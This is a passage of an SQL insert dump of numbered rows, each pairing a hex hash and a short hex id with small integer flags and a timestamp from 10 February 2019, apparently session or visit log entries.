(58122, '112d5881b766687ff32cb809b172ebd3', '841bb192fc2f2409', 0, 2, 1, '2019-02-10 08:05:07'),
(58123, '92ef39a4ae92862ce73ebcb6effae177', '094c4fc3019f9165', 0, 2, 1, '2019-02-10 08:05:11'),
(58124, '92ef39a4ae92862ce73ebcb6effae177', '094c4fc3019f9165', 0, 2, 1, '2019-02-10 08:05:22'),
(58125, 'd6118d7138b70c3caa5b2e15c1efc8f4', '1d9c54d0b37930ed', 0, 2, 1, '2019-02-10 08:05:24'),
(58126, 'd6118d7138b70c3caa5b2e15c1efc8f4', '1d9c54d0b37930ed', 0, 2, 1, '2019-02-10 08:05:34'),
(58127, 'b6e0e1639d01b793a6a665c66227b98f', '841bb192fc2f2409', 0, 2, 1, '2019-02-10 08:06:40'),
(58128, 'f82d01e02df04a3324d508200db4841a', '98a0578f4e646528', 0, 2, 1, '2019-02-10 08:07:23'),
(58129, '5ce481a454b5fd8622cddb97932c3ea2', 'dace6e0c219330fc', 0, 2, 1, '2019-02-10 08:07:51'),
(58130, 'cfe2f19b0667cd9bdbc46a0f5d03aa1b', '3ff5f91ea9920066', 0, 2, 1, '2019-02-10 08:09:02'),
(58131, '92ef39a4ae92862ce73ebcb6effae177', '094c4fc3019f9165', 0, 2, 1, '2019-02-10 08:09:05'),
(58132, 'cfe2f19b0667cd9bdbc46a0f5d03aa1b', '3ff5f91ea9920066', 0, 2, 1, '2019-02-10 08:09:43'),
(58133, 'e5a7e2348f57d4a0f10d7432e0a6160f', 'e706e9a0184b2202', 0, 2, 1, '2019-02-10 08:09:44'),
(58134, '823ca39555e7386e37afdc0749823c3f', '8fc3242b958707a2', 0, 2, 1, '2019-02-10 08:11:27'),
(58135, '42bbc493eec719db0e71ee405fc9e52a', '83e475d8a3eea7c6', 0, 2, 1, '2019-02-10 08:17:37'),
(58136, '500982d2ff644d8da90595cc722ef807', '552f828db01a4f62', 0, 2, 1, '2019-02-10 08:17:59'),
(58137, '92ef39a4ae92862ce73ebcb6effae177', '094c4fc3019f9165', 0, 2, 1, '2019-02-10 08:20:21'),
(58138, '68c31629a26f1fbc557168e58fbfff25', 'b301d833ea94d585', 0, 2, 1, '2019-02-10 08:21:33'),
(58139, 'e305dfd072f6513be95aa5b31345b9fa', 'bb228da07c88dfbe', 0, 2, 1, '2019-02-10 08:22:26'),
(58140, '80f6b76be9c7762f9b36b23800a56dc9', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-10 08:25:00'),
(58141, 'e305dfd072f6513be95aa5b31345b9fa', 'bb228da07c88dfbe', 0, 2, 1, '2019-02-10 08:26:03'),
(58142, 'abf5ac72293611f773d9a6697f34ca7c', '135f23c8a85974ba', 0, 2, 1, '2019-02-10 08:27:22'),
(58143, 'c6b58bf91e8debf63459a4827fc550d7', '9df7df0ff1238153', 0, 2, 1, '2019-02-10 08:29:32'),
(58144, '0a530679e6fdc50884accd0705edb689', 'e4549505b3e6247e', 0, 2, 1, '2019-02-10 08:29:54'),
(58145, 'c6b58bf91e8debf63459a4827fc550d7', '9df7df0ff1238153', 0, 2, 1, '2019-02-10 08:30:31'),
(58146, '92ef39a4ae92862ce73ebcb6effae177', '094c4fc3019f9165', 0, 2, 1, '2019-02-10 08:32:13'),
(58147, 'bb3231696038664c049b71923c1b2184', '29608a328df169fa', 0, 2, 1, '2019-02-10 08:32:34'),
(58148, '92ef39a4ae92862ce73ebcb6effae177', '094c4fc3019f9165', 0, 2, 1, '2019-02-10 08:32:55'),
(58149, '97cfc15496fcb456475ead33e5f8c0a3', '341eb6a79e6e532e', 0, 2, 1, '2019-02-10 08:33:51'),
(58150, '97cfc15496fcb456475ead33e5f8c0a3', '341eb6a79e6e532e', 0, 2, 1, '2019-02-10 08:33:54'),
(58151, '167b83a3471021326e98139f5929b583', '703c48bb6c3dcff0', 0, 2, 1, '2019-02-10 08:35:16'),
(58152, '77d579f2b710be1c34227d4293e8c0eb', 'a44ac4db884f64d7', 0, 2, 1, '2019-02-10 08:36:21'),
(58153, '42bbc493eec719db0e71ee405fc9e52a', '83e475d8a3eea7c6', 0, 2, 1, '2019-02-10 08:37:21'),
(58154, '77d579f2b710be1c34227d4293e8c0eb', 'a44ac4db884f64d7', 0, 2, 1, '2019-02-10 08:38:32'),
(58155, 'bb3231696038664c049b71923c1b2184', '29608a328df169fa', 0, 2, 1, '2019-02-10 08:38:32'),
(58156, '77d579f2b710be1c34227d4293e8c0eb', 'a44ac4db884f64d7', 0, 2, 1, '2019-02-10 08:39:50'),
(58157, 'd4ad84ce71433e9a2a3824fb1087a173', '841bb192fc2f2409', 0, 2, 1, '2019-02-10 08:40:10'),
(58158, 'a458df5de23c40760f594ed68bfaa8d6', '1c68b977b911188c', 0, 2, 1, '2019-02-10 08:40:14'),
(58159, '77d579f2b710be1c34227d4293e8c0eb', 'a44ac4db884f64d7', 0, 2, 1, '2019-02-10 08:40:39'),
(58160, '7d7f127eeee49192d6e9a36c9a6a791c', '7c0337f3afd605a3', 0, 2, 1, '2019-02-10 08:41:04'),
(58161, '74cc0ff25c25b677f9d977c2d78f2295', 'a4a07b7594d06ca8', 0, 2, 1, '2019-02-10 08:41:11'),
(58162, '74cc0ff25c25b677f9d977c2d78f2295', 'a4a07b7594d06ca8', 0, 2, 1, '2019-02-10 08:41:29'),
(58163, 'd4ad84ce71433e9a2a3824fb1087a173', '841bb192fc2f2409', 0, 2, 1, '2019-02-10 08:42:00'),
(58164, '7d7f127eeee49192d6e9a36c9a6a791c', '7c0337f3afd605a3', 0, 2, 1, '2019-02-10 08:44:00'),
(58165, '6f469e302ff11ee55294e6f014adcd14', 'ba260aea459b0b37', 0, 2, 1, '2019-02-10 08:44:13'),
(58166, 'bfaef7ac5e46ebe18401029318d656cd', '324d0c5c1f480926', 0, 2, 1, '2019-02-10 08:46:24'),
(58167, '3a087ba711e3a38b4306729bfecf97ed', 'b3ac5173263a9f96', 0, 2, 1, '2019-02-10 08:48:41'),
(58168, 'bb3231696038664c049b71923c1b2184', '29608a328df169fa', 0, 2, 1, '2019-02-10 08:50:51'),
(58169, '27de23a1adecbce274d1c689ae8d3294', '778437c271f8ebc3', 0, 2, 1, '2019-02-10 08:51:28'),
(58170, '27de23a1adecbce274d1c689ae8d3294', '778437c271f8ebc3', 0, 2, 1, '2019-02-10 08:51:51'),
(58171, '20a9f61acc5296ecf908e815758e13ea', 'dba49dcafdc2b991', 0, 2, 1, '2019-02-10 08:51:59'),
(58172, '20a9f61acc5296ecf908e815758e13ea', 'dba49dcafdc2b991', 0, 2, 1, '2019-02-10 08:52:05'),
(58173, '13766348dfad2e1d966bb898b938650b', '776dcce744ef316e', 0, 2, 1, '2019-02-10 08:57:41'),
(58174, '13766348dfad2e1d966bb898b938650b', '776dcce744ef316e', 0, 2, 1, '2019-02-10 08:58:31'),
(58175, '13766348dfad2e1d966bb898b938650b', '776dcce744ef316e', 0, 2, 1, '2019-02-10 08:59:29'),
(58176, '13766348dfad2e1d966bb898b938650b', '776dcce744ef316e', 0, 2, 1, '2019-02-10 08:59:46'),
(58177, '5ce481a454b5fd8622cddb97932c3ea2', 'dace6e0c219330fc', 0, 2, 1, '2019-02-10 09:01:11'),
(58178, '114965a6f8e24e7bb71e9bc7bbe31513', 'b43949f3d3a73617', 0, 2, 1, '2019-02-10 09:02:01'),
(58179, 'e5a7e2348f57d4a0f10d7432e0a6160f', 'e706e9a0184b2202', 0, 2, 1, '2019-02-10 09:02:46'),
(58180, 'd4ad84ce71433e9a2a3824fb1087a173', '841bb192fc2f2409', 0, 2, 1, '2019-02-10 09:03:05'),
(58181, '74cc0ff25c25b677f9d977c2d78f2295', 'a4a07b7594d06ca8', 0, 2, 1, '2019-02-10 09:03:29'),
(58182, '5ce481a454b5fd8622cddb97932c3ea2', 'dace6e0c219330fc', 0, 2, 1, '2019-02-10 09:06:00'),
(58183, 'bfaef7ac5e46ebe18401029318d656cd', '324d0c5c1f480926', 0, 2, 1, '2019-02-10 09:07:14'),
(58184, '0a530679e6fdc50884accd0705edb689', 'e4549505b3e6247e', 0, 2, 1, '2019-02-10 09:07:31'),
(58185, '0a9b95c886696aaa977ff2c289694794', '67d9c3341cc72093', 0, 2, 1, '2019-02-10 09:09:23'),
(58186, '92ef39a4ae92862ce73ebcb6effae177', '094c4fc3019f9165', 0, 2, 1, '2019-02-10 09:11:00'),
(58187, 'e5a7e2348f57d4a0f10d7432e0a6160f', 'e706e9a0184b2202', 0, 2, 1, '2019-02-10 09:11:09'),
(58188, '766705ad60ce6d14fe6645fada0851cd', '84c73015e9e28e8a', 0, 2, 1, '2019-02-10 09:11:12'),
(58189, '766705ad60ce6d14fe6645fada0851cd', '84c73015e9e28e8a', 0, 2, 1, '2019-02-10 09:11:26'),
(58190, 'e5a7e2348f57d4a0f10d7432e0a6160f', 'e706e9a0184b2202', 0, 2, 1, '2019-02-10 09:13:18'),
(58191, '20a9f61acc5296ecf908e815758e13ea', 'dba49dcafdc2b991', 0, 2, 1, '2019-02-10 09:15:26'),
(58192, '8c0db8c21f506fde7ecd38909bb8f6d7', '67d9c3341cc72093', 0, 2, 1, '2019-02-10 09:15:52'),
(58193, 'e5a7e2348f57d4a0f10d7432e0a6160f', 'e706e9a0184b2202', 0, 2, 1, '2019-02-10 09:16:59'),
(58194, 'e5a7e2348f57d4a0f10d7432e0a6160f', 'e706e9a0184b2202', 0, 2, 1, '2019-02-10 09:17:02'),
(58195, 'bb3231696038664c049b71923c1b2184', '29608a328df169fa', 0, 2, 1, '2019-02-10 09:17:55'),
(58196, '766705ad60ce6d14fe6645fada0851cd', '84c73015e9e28e8a', 0, 2, 1, '2019-02-10 09:18:59'),
(58197, 'bb3231696038664c049b71923c1b2184', '29608a328df169fa', 0, 2, 1, '2019-02-10 09:19:39'),
(58198, 'bb3231696038664c049b71923c1b2184', '29608a328df169fa', 0, 2, 1, '2019-02-10 09:22:07'),
(58199, '429a08c9f65aeeb5c858332acf5a3af3', '53b6517d925fc18a', 0, 2, 1, '2019-02-10 09:23:09'),
(58200, '0ac2079fc8bcd3bf892a777125d606b7', 'a4606350cb27c277', 0, 2, 1, '2019-02-10 09:23:25'),
(58201, 'e5a7e2348f57d4a0f10d7432e0a6160f', 'e706e9a0184b2202', 0, 2, 1, '2019-02-10 09:24:54'),
(58202, '20a9f61acc5296ecf908e815758e13ea', 'dba49dcafdc2b991', 0, 2, 1, '2019-02-10 09:25:01'),
(58203, '20a9f61acc5296ecf908e815758e13ea', 'dba49dcafdc2b991', 0, 2, 1, '2019-02-10 09:25:44'),
(58204, 'bb3231696038664c049b71923c1b2184', '29608a328df169fa', 0, 2, 1, '2019-02-10 09:27:57'),
(58205, '92ef39a4ae92862ce73ebcb6effae177', '094c4fc3019f9165', 0, 2, 1, '2019-02-10 09:28:37'),
(58206, '6f3aa380d121f336cabfb0c216aa1b3b', '77d629067fed3a03', 0, 2, 1, '2019-02-10 09:29:15'),
(58207, 'fa9eb871daa8cd56459c04f279a4e209', '90305912da5eb2ee', 0, 2, 1, '2019-02-10 09:30:14'),
(58208, 'fa9eb871daa8cd56459c04f279a4e209', '90305912da5eb2ee', 0, 2, 1, '2019-02-10 09:30:39'),
(58209, '25f288c358de5bb45bb7aa14a5c5bef7', '74aba437eea39f30', 0, 2, 1, '2019-02-10 09:31:52'),
(58210, 'fa9eb871daa8cd56459c04f279a4e209', '90305912da5eb2ee', 0, 2, 1, '2019-02-10 09:32:13'),
(58211, '7d7f127eeee49192d6e9a36c9a6a791c', '7c0337f3afd605a3', 0, 2, 1, '2019-02-10 09:33:01'),
(58212, 'd8ecfa3f760264dd00ffff7069238c8f', 'b2bafb74467116e9', 0, 2, 1, '2019-02-10 09:33:16'),
(58213, 'fa9eb871daa8cd56459c04f279a4e209', '90305912da5eb2ee', 0, 2, 1, '2019-02-10 09:33:35'),
(58214, 'b742490b792b50f591b264b9f9d8585f', '67d9c3341cc72093', 0, 2, 1, '2019-02-10 09:33:57'),
(58215, 'bb3231696038664c049b71923c1b2184', '29608a328df169fa', 0, 2, 1, '2019-02-10 09:35:01'),
(58216, '6175dd16732de2b1da8bbd31c30a46d2', 'e706e9a0184b2202', 0, 2, 1, '2019-02-10 09:35:43'),
(58217, '7d7f127eeee49192d6e9a36c9a6a791c', '7c0337f3afd605a3', 0, 2, 1, '2019-02-10 09:36:12'),
(58218, '7d7f127eeee49192d6e9a36c9a6a791c', '7c0337f3afd605a3', 0, 2, 1, '2019-02-10 09:36:32'),
(58219, '7d7f127eeee49192d6e9a36c9a6a791c', '7c0337f3afd605a3', 0, 2, 1, '2019-02-10 09:37:16'),
(58220, 'cb1987a7adfaa55acf390657c77023af', 'd74fcaf5b9733b44', 0, 2, 1, '2019-02-10 09:38:14'),
(58221, '6f3aa380d121f336cabfb0c216aa1b3b', '77d629067fed3a03', 0, 2, 1, '2019-02-10 09:38:54'),
(58222, 'e8b9d9bbede9cddd031672a32a0b0d32', 'e3413f2163c4f64a', 0, 2, 1, '2019-02-10 09:40:34'),
(58223, '6175dd16732de2b1da8bbd31c30a46d2', 'e706e9a0184b2202', 0, 2, 1, '2019-02-10 09:40:40'),
(58224, '6f3aa380d121f336cabfb0c216aa1b3b', '77d629067fed3a03', 0, 2, 1, '2019-02-10 09:40:45'),
(58225, '6a10fcbe2d91580c0d027697e2837163', 'e706e9a0184b2202', 0, 2, 1, '2019-02-10 09:44:41'),
(58226, '38a79d500a563fdc8804bfb23f19b127', '64a658fbde059399', 0, 2, 1, '2019-02-10 09:46:02'),
(58227, '7d7f127eeee49192d6e9a36c9a6a791c', '7c0337f3afd605a3', 0, 2, 1, '2019-02-10 09:47:06'),
(58228, '6a10fcbe2d91580c0d027697e2837163', 'e706e9a0184b2202', 0, 2, 1, '2019-02-10 09:47:22'),
(58229, '6104de40d4eb436d0fcb582e0232f649', '44c34788d86eea75', 0, 2, 1, '2019-02-10 09:48:39'),
(58230, '20a9f61acc5296ecf908e815758e13ea', 'dba49dcafdc2b991', 0, 2, 1, '2019-02-10 09:48:53'),
(58231, '208c86f80e909844aa3a7eedf4ef58b4', '986db0610a5e2d71', 0, 2, 1, '2019-02-10 09:48:54'),
(58232, '20a9f61acc5296ecf908e815758e13ea', 'dba49dcafdc2b991', 0, 2, 1, '2019-02-10 09:49:25'),
(58233, 'e305dfd072f6513be95aa5b31345b9fa', 'bb228da07c88dfbe', 0, 2, 1, '2019-02-10 09:50:22'),
(58234, 'ed6ca4a6940be60b36b33c254cc9bcb7', 'd57c6a47a6711062', 0, 2, 1, '2019-02-10 09:52:20'),
(58235, 'fa3af8aa7edf807b80e4f1a0dfc32b34', '675a337c1c168ee0', 0, 2, 1, '2019-02-10 09:52:41'),
(58236, '6a10fcbe2d91580c0d027697e2837163', 'e706e9a0184b2202', 0, 2, 1, '2019-02-10 09:52:53'),
(58237, 'ed6ca4a6940be60b36b33c254cc9bcb7', 'd57c6a47a6711062', 0, 2, 1, '2019-02-10 09:53:40'),
(58238, 'ed6ca4a6940be60b36b33c254cc9bcb7', 'd57c6a47a6711062', 0, 2, 1, '2019-02-10 09:53:54'),
(58239, 'ed6ca4a6940be60b36b33c254cc9bcb7', 'd57c6a47a6711062', 0, 2, 1, '2019-02-10 09:54:04'),
(58240, '9e1981637d433886f808697fad714b4c', '600b74ad76645b53', 0, 2, 1, '2019-02-10 09:54:07'),
(58241, '4987c7fe38aeeaec8286c2a66a75369e', '4e50a6ab17b82ef5', 0, 2, 1, '2019-02-10 09:54:57'),
(58242, '0a530679e6fdc50884accd0705edb689', 'e4549505b3e6247e', 0, 2, 1, '2019-02-10 09:56:27'),
(58243, 'ed6ca4a6940be60b36b33c254cc9bcb7', 'd57c6a47a6711062', 0, 2, 1, '2019-02-10 09:56:47'),
(58244, '823ca39555e7386e37afdc0749823c3f', '8fc3242b958707a2', 0, 2, 1, '2019-02-10 09:57:21'),
(58245, '048d359ab44219a0bde9ef917ade91ad', '81813d0a0d1e159b', 0, 2, 1, '2019-02-10 09:58:11'),
(58246, '7d7f127eeee49192d6e9a36c9a6a791c', '7c0337f3afd605a3', 0, 2, 1, '2019-02-10 10:00:50'),
(58247, '6a10fcbe2d91580c0d027697e2837163', 'e706e9a0184b2202', 0, 2, 1, '2019-02-10 10:01:23'),
(58248, '7b5194df3834f8caa37bea76255519ff', '200f27321b42f4b3', 0, 2, 1, '2019-02-10 10:01:53'),
(58249, '0a530679e6fdc50884accd0705edb689', 'e4549505b3e6247e', 0, 2, 1, '2019-02-10 10:02:50'),
(58250, 'bb3231696038664c049b71923c1b2184', '29608a328df169fa', 0, 2, 1, '2019-02-10 10:08:32'),
(58251, '80f6b76be9c7762f9b36b23800a56dc9', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-02-10 10:09:19'),
(58252, 'b43fdd5d8d941b1f3997649f296590b8', 'de9b8e6bc6e762ed', 0, 2, 1, '2019-02-10 10:14:40'),
(58253, 'b43fdd5d8d941b1f3997649f296590b8', 'de9b8e6bc6e762ed', 0, 2, 1, '2019-02-10 10:15:36'),
(58254, '6a10fcbe2d91580c0d027697e2837163', 'e706e9a0184b2202', 0, 2, 1, '2019-02-10 10:15:52'),
(58255, '500982d2ff644d8da90595cc722ef807', '552f828db01a4f62', 0, 2, 1, '2019-02-10 10:16:01'),
(58256, '500982d2ff644d8da90595cc722ef807', '552f828db01a4f62', 0, 2, 1, '2019-02-10 10:16:38'),
(58257, 'a458df5de23c40760f594ed68bfaa8d6', '1c68b977b911188c', 0, 2, 1, '2019-02-10 10:17:27'),
(58258, '6a10fcbe2d91580c0d027697e2837163', 'e706e9a0184b2202', 0, 2, 1, '2019-02-10 10:18:18'),
(58259, 'ace2f40b60a5fa251149609b892a4120', 'e9bb42a0dfbd7013', 0, 2, 1, '2019-02-10 10:27:43'),
(58260, 'ace2f40b60a5fa251149609b892a4120', 'e9bb42a0dfbd7013', 0, 2, 1, '2019-02-10 10:28:11'),
(58261, '710153bb8c7a5d878044506ea1c3a5e4', 'da6c922121ca1f89', 0, 2, 1, '2019-02-10 10:28:58'),
(58262, '149fd45935d7db94eb225326d7565721', 'a44ac4db884f64d7', 0, 2, 1, '2019-02-10 10:30:03'),
(58263, 'a458df5de23c40760f594ed68bfaa8d6', '1c68b977b911188c', 0, 2, 1, '2019-02-10 10:33:50'),
(58264, '6a10fcbe2d91580c0d027697e2837163', 'e706e9a0184b2202', 0, 2, 1, '2019-02-10 10:34:36'),
(58265, 'c3c2881ddb0a58226bccc094c134f42f', '66cd2ffd1b716f5a', 0, 2, 1, '2019-02-10 10:36:09'),
(58266, 'a61bad83d5a52f8131b1c309bc6a0b24', '6b9ac4f4214cb978', 0, 2, 1, '2019-02-10 10:38:43'),
(58267, 'd4ad84ce71433e9a2a3824fb1087a173', '841bb192fc2f2409', 0, 2, 1, '2019-02-10 10:39:58'),
(58268, 'bb3231696038664c049b71923c1b2184', '29608a328df169fa', 0, 2, 1, '2019-02-10 10:40:36'),
(58269, 'd4ad84ce71433e9a2a3824fb1087a173', '841bb192fc2f2409', 0, 2, 1, '2019-02-10 10:41:08'),
(58270, 'd381d8f97e3aaec05cf90e193608c8e5', '54b0874851aa349c', 0, 2, 1, '2019-02-10 10:41:11'),
(58271, 'd4ad84ce71433e9a2a3824fb1087a173', '841bb192fc2f2409', 0, 2, 1, '2019-02-10 10:42:10'),
(58272, '6a10fcbe2d91580c0d027697e2837163', 'e706e9a0184b2202', 0, 2, 1, '2019-02-10 10:44:24'),
(58273, 'bb3231696038664c049b71923c1b2184', '29608a328df169fa', 0, 2, 1, '2019-02-10 10:46:10'),
(58274, '6a10fcbe2d91580c0d027697e2837163', 'e706e9a0184b2202', 0, 2, 1, '2019-02-10 10:46:19'),
(58275, 'a458df5de23c40760f594ed68bfaa8d6', '1c68b977b911188c', 0, 2, 1, '2019-02-10 10:46:59'),
(58276, '12523dfe69263dd4107c5600f032effa', 'cd931064f096776b', 0, 2, 1, '2019-02-10 10:50:30'),
(58277, '458ba5c9be1a60c92217d3895093afe2', 'ec33600f1f3ca996', 0, 2, 1, '2019-02-10 10:53:52'),
(58278, '315183a37663a1b863e5d53d9d917e43', '93f30eaefda9d8c4', 0, 2, 1, '2019-02-10 10:54:48'),
(58279, '6a10fcbe2d91580c0d027697e2837163', 'e706e9a0184b2202', 0, 2, 1, '2019-02-10 10:55:28'),
(58280, '253f9f34a21d531a7b2db96a48c3968e', '3db62dd866d5a698', 0, 2, 1, '2019-02-10 10:56:09'),
(58281, '253f9f34a21d531a7b2db96a48c3968e', '3db62dd866d5a698', 0, 2, 1, '2019-02-10 10:56:54'),
(58282, '315183a37663a1b863e5d53d9d917e43', '93f30eaefda9d8c4', 0, 2, 1, '2019-02-10 10:57:11'),
(58283, '253f9f34a21d531a7b2db96a48c3968e', '3db62dd866d5a698', 0, 2, 1, '2019-02-10 10:57:50'),
(58284, '315183a37663a1b863e5d53d9d917e43', '93f30eaefda9d8c4', 0, 2, 1, '2019-02-10 10:58:16'),
(58285, '253f9f34a21d531a7b2db96a48c3968e', '3db62dd866d5a698', 0, 2, 1, '2019-02-10 11:00:02'),
(58286, '253f9f34a21d531a7b2db96a48c3968e', '3db62dd866d5a698', 0, 2, 1, '2019-02-10 11:00:40'),
(58287, '253f9f34a21d531a7b2db96a48c3968e', '3db62dd866d5a698', 0, 2, 1, '2019-02-10 11:00:49'),
(58288, '253f9f34a21d531a7b2db96a48c3968e', '3db62dd866d5a698', 0, 2, 1, '2019-02-10 11:01:01'),
(58289, '253f9f34a21d531a7b2db96a48c3968e', '3db62dd866d5a698', 0, 2, 1, '2019-02-10 11:01:23'),
(58290, '253f9f34a21d531a7b2db96a48c3968e', '3db62dd866d5a698', 0, 2, 1, '2019-02-10 11:02:02'),
(58291, '31b5b3c0130d71176e70f271097d501d', '32b169e936bbe5df', 0, 2, 1, '2019-02-10 11:02:13'),
(58292, '253f9f34a21d531a7b2db96a48c3968e', '3db62dd866d5a698', 0, 2, 1, '2019-02-10 11:02:36'),
(58293, '253f9f34a21d531a7b2db96a48c3968e', '3db62dd866d5a698', 0, 2, 1, '2019-02-10 11:03:02'),
(58294, '253f9f34a21d531a7b2db96a48c3968e', '3db62dd866d5a698', 0, 2, 1, '2019-02-10 11:04:28'),
(58295, '253f9f34a21d531a7b2db96a48c3968e', '3db62dd866d5a698', 0, 2, 1, '2019-02-10 11:06:35'),
(58296, '0881eebeed9d7d5f92391ff02ca0880d', '2747e15bce5a19d0', 0, 2, 1, '2019-02-10 11:06:42'),
(58297, '0881eebeed9d7d5f92391ff02ca0880d', '2747e15bce5a19d0', 0, 2, 1, '2019-02-10 11:06:54'),
(58298, 'bb3231696038664c049b71923c1b2184', '29608a328df169fa', 0, 2, 1, '2019-02-10 11:08:07'),
(58299, '43ce710d45ab61166ee77c719f41e43d', 'baa8d16c1a4e5230', 0, 2, 1, '2019-02-10 11:12:36'),
(58300, '5a52e9bb327e8a30e7596e088d5e4e58', 'a2b92167f54c9dc2', 0, 2, 1, '2019-02-10 11:12:49'),
(58301, '43ce710d45ab61166ee77c719f41e43d', 'baa8d16c1a4e5230', 0, 2, 1, '2019-02-10 11:13:16'),
(58302, '5a52e9bb327e8a30e7596e088d5e4e58', 'a2b92167f54c9dc2', 0, 2, 1, '2019-02-10 11:13:23'),
(58303, 'bb3231696038664c049b71923c1b2184', '29608a328df169fa', 0, 2, 1, '2019-02-10 11:17:29'),
(58304, '4987c7fe38aeeaec8286c2a66a75369e', '4e50a6ab17b82ef5', 0, 2, 1, '2019-02-10 11:21:59'),
(58305, '43ce710d45ab61166ee77c719f41e43d', 'baa8d16c1a4e5230', 0, 2, 1, '2019-02-10 11:24:22'),
(58306, '048d359ab44219a0bde9ef917ade91ad', '81813d0a0d1e159b', 0, 2, 1, '2019-02-10 11:28:01'),
(58307, '6f469e302ff11ee55294e6f014adcd14', 'ba260aea459b0b37', 0, 2, 1, '2019-02-10 11:29:12'),
(58308, '6f469e302ff11ee55294e6f014adcd14', 'ba260aea459b0b37', 0, 2, 1, '2019-02-10 11:29:53'),
(58309, '34ae110e7bb198b86accbe4b8eeb887c', 'ff375385f44bf16e', 0, 2, 1, '2019-02-10 11:30:00'),
(58310, '6f469e302ff11ee55294e6f014adcd14', 'ba260aea459b0b37', 0, 2, 1, '2019-02-10 11:30:40'),
(58311, '905694a763760204cab65baeac4ea519', '0c3b18a297f7fa46', 0, 2, 1, '2019-02-10 11:35:21'),
(58312, 'bb3231696038664c049b71923c1b2184', '29608a328df169fa', 0, 2, 1, '2019-02-10 11:37:20'),
(58313, 'd6118d7138b70c3caa5b2e15c1efc8f4', '1d9c54d0b37930ed', 0, 2, 1, '2019-02-10 11:43:48'),
(58314, '09cf51cc0b3afe213c61a5eeb92bbed0', 'b4ecb18ba7992a18', 0, 2, 1, '2019-02-10 11:54:15'),
(58315, 'd6118d7138b70c3caa5b2e15c1efc8f4', '1d9c54d0b37930ed', 0, 2, 1, '2019-02-10 12:00:35'),
(58316, 'a58ddd8cb4ba3eb07086701e9009d9d8', '65e1b73cf3be5c3f', 0, 2, 1, '2019-02-10 12:02:24'),
(58317, 'a58ddd8cb4ba3eb07086701e9009d9d8', '65e1b73cf3be5c3f', 0, 2, 1, '2019-02-10 12:02:47'),
(58318, '31b5b3c0130d71176e70f271097d501d', '32b169e936bbe5df', 0, 2, 1, '2019-02-10 12:05:12'),
(58319, 'bb3231696038664c049b71923c1b2184', '29608a328df169fa', 0, 2, 1, '2019-02-10 12:05:37'),
(58320, '0d880591571a4ba71c65946e704187da', 'f749ba11262dd9a4', 0, 2, 1, '2019-02-10 12:07:08'),
(58321, '4cf7a1b1fdccb0c7a48f881c428f5309', 'd04c5d81b6e92e1c', 0, 2, 1, '2019-02-10 12:07:11'),
(58322, '0d880591571a4ba71c65946e704187da', 'f749ba11262dd9a4', 0, 2, 1, '2019-02-10 12:07:33'),
(58323, '0d880591571a4ba71c65946e704187da', 'f749ba11262dd9a4', 0, 2, 1, '2019-02-10 12:07:49'),
(58324, '0d880591571a4ba71c65946e704187da', 'f749ba11262dd9a4', 0, 2, 1, '2019-02-10 12:08:15'),
(58325, 'bb3231696038664c049b71923c1b2184', '29608a328df169fa', 0, 2, 1, '2019-02-10 12:13:11'),
(58326, '8672a3780296bca7ebcda1030e33561a', '0bf16c319bd2f666', 0, 2, 1, '2019-02-10 12:13:55'),
(58327, 'c6983ad191c182f5745d024cef03b1db', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-02-10 12:15:39'),
(58328, '26e3527b3d2cc5b23e0912c61e0c5a1e', 'fad01d98df9c57f2', 0, 2, 1, '2019-02-10 12:16:49'),
(58329, '26e3527b3d2cc5b23e0912c61e0c5a1e', 'fad01d98df9c57f2', 0, 2, 1, '2019-02-10 12:17:32'),
(58330, '6a10fcbe2d91580c0d027697e2837163', 'e706e9a0184b2202', 0, 2, 1, '2019-02-10 12:19:08'),
(58331, 'b20147884a303f1a7f7b2cf5b7029751', '4e5ac6ea987efb6d', 0, 2, 1, '2019-02-10 12:25:07'),
(58332, 'efe22a02a804917307c86c5184dc6392', '679c2311f97bf8cf', 0, 2, 1, '2019-02-10 12:25:38'),
(58333, 'bb3231696038664c049b71923c1b2184', '29608a328df169fa', 0, 2, 1, '2019-02-10 12:27:01'),
(58334, 'daca2cb6874e46cbfddb8bf2f4267470', 'b3fb8540efdab4b7', 0, 2, 1, '2019-02-10 12:28:25'),
(58335, 'bb3231696038664c049b71923c1b2184', '29608a328df169fa', 0, 2, 1, '2019-02-10 12:30:11'),
(58336, 'bfaef7ac5e46ebe18401029318d656cd', '324d0c5c1f480926', 0, 2, 1, '2019-02-10 12:32:10'),
(58337, 'bfaef7ac5e46ebe18401029318d656cd', '324d0c5c1f480926', 0, 2, 1, '2019-02-10 12:33:28'),
(58338, '18f051861e2b3bfeee74bfe6ac54bf4c', 'e1e5b580d5095e07', 0, 2, 1, '2019-02-10 12:34:13'),
(58339, 'b567ef9df3aa2de25c8c21639d70bbc3', '67d9c3341cc72093', 0, 2, 1, '2019-02-10 12:34:37'),
(58340, 'd6118d7138b70c3caa5b2e15c1efc8f4', '1d9c54d0b37930ed', 0, 2, 1, '2019-02-10 12:36:05'),
(58341, '26e3527b3d2cc5b23e0912c61e0c5a1e', 'fad01d98df9c57f2', 0, 2, 1, '2019-02-10 12:36:39'),
(58342, 'd6118d7138b70c3caa5b2e15c1efc8f4', '1d9c54d0b37930ed', 0, 2, 1, '2019-02-10 12:36:49'),
(58343, '42bbc493eec719db0e71ee405fc9e52a', '83e475d8a3eea7c6', 0, 2, 1, '2019-02-10 12:37:28'),
(58344, '82bde3c12e057abd7274178b24b90187', '203cc41606169b63', 0, 2, 1, '2019-02-10 12:40:20'),
(58345, '03d7c40f59b43b5a851659911abd1456', '50d02461c9e1908b', 0, 2, 1, '2019-02-10 12:41:59'),
(58346, '03d7c40f59b43b5a851659911abd1456', '50d02461c9e1908b', 0, 2, 1, '2019-02-10 12:42:21'),
(58347, '7dad1c0203de9b159ed3dadfd1a88955', 'ec18b138536ee06e', 0, 2, 1, '2019-02-10 12:59:09'),
(58348, '43f6393d6f4903f79ec24c08c2e482ea', '9b439e4e6dd53e8a', 0, 2, 1, '2019-02-10 13:04:45'),
(58349, '7b360c37a7c7d97885e48a4ba2224db5', '8951f0efdfccbe5d', 0, 2, 1, '2019-02-10 13:22:53'),
(58350, '36ad60be7137fa37a23d379d6baef276', 'b425851567b3dc9b', 0, 2, 1, '2019-02-10 13:26:43'),
(58351, '7dad1c0203de9b159ed3dadfd1a88955', 'ec18b138536ee06e', 0, 2, 1, '2019-02-10 13:37:44'),
(58352, '28b32515663291adc1775daa39e59a31', 'd20bfcce8a5a2969', 0, 2, 1, '2019-02-10 13:40:39'),
